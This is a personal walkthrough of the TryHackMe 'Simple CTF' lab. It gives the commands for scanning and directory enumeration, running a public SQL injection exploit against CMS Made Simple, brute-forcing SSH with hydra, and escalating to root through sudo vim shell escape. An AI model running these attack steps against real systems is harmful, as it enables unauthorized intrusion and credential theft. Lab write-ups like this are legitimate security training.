Simple CTF Walkthrough-Try Hackme
Hello Everyone, welcome to another CTF walkthrough. Hope everyone are doing good.
Lets begin with our walkthrough.
Visit tryhackme.com website and connect to the Simple CTF challenge.
Target IP :10.10.57.170
Note: In the mid way because of my network issue I got disconnected and new ip was assigned by the target (10.10.120.76) when I reconnected.
First ping the target machine and check if the machines are communicating.
Command : ping 10.10.57.170
Later let us try to scan the target machine using Nmap.
- Port 21/tcp →open
- Port 80/http →open
- Port 2222/ssh → open
As we know port 80 is open, we will try the target address in the browser to check its behavior.
URL : http://10.10.57.170
As we can see apache server is open.
Next we will perform directory scanning using gobuster. This will list all the available directories.
Command : gobuster dir -u http://10.10.57.170 -t 100 -e -w /usr/share/wordlists/dirb/common.txt
from the scan we found two interesting directory/file
- /robots.txt
- /simple
Trying with /robots.txt revealed that there is one use called mike.
URL : http://10.10.57.170/robots.txt
Now we will try with /simple
URL : http://10.10.57.170/simple
This took us to the CMS website.
by navigating in website we found CMS version 2.2.8
With the version we googled for any exploits.
We found CMS made simple <2.2.10 -SQL injection exploit.
we will downloaded the exploit to our kali machine and and check its contents using Nano editor.
now we will use the above exploit.
command is : pyhton 46635.py -u http://10.10.57.170 — crack -w /usr/share/wordlists/rockyou.txt.
The exploit was giving error for request module and term color module.
ImportError: No module name request.
After researching about this error and trying out many thing, i got to know that the exploit is in python2 but my kali is using python3.
so, we should change priority of python2 to first.
The below website helps us with this commands.
https://linuxconfig.org/ubuntu-20-04-python-version-switch-manager
After resolving the error and trying with exploit, got got to know about the user called mitch.
Password cracking was taking lot of time with the exploit, so i decided to use hydra tool for password cracking.
command : hydra -u mitch -P /usr/share/wordlists/rockyou.txt <target ip>-s 2222 ssh
We got the credentials of mitch.
username : mitch
password : secret
Now we will try to connect to mitch through ssh port 2222.
command :ssh mitch@<targetip> -p 2222.
We are now connected to mitch.
command : id
As we can see that mitch is a normal user.
Navigating the directories. we found the user.txt flag.
Further exploring in revealed that there was another user called sunbath.
Now we should escalate our privileges so we will use the below command
command : sudo -l
as we can see that /usr/bin/vim can be executed with root privileges with no password.
So, in gtfobins website we found the exploit for getting SUDO privileges with VIM.
The exploit command/script is : sudo vim -c ‘:!/bin/sh’
we got in as root.
Further navigating we got the root.txt and root flag
YES!!! we completed the task.
Thank you and have a great day.
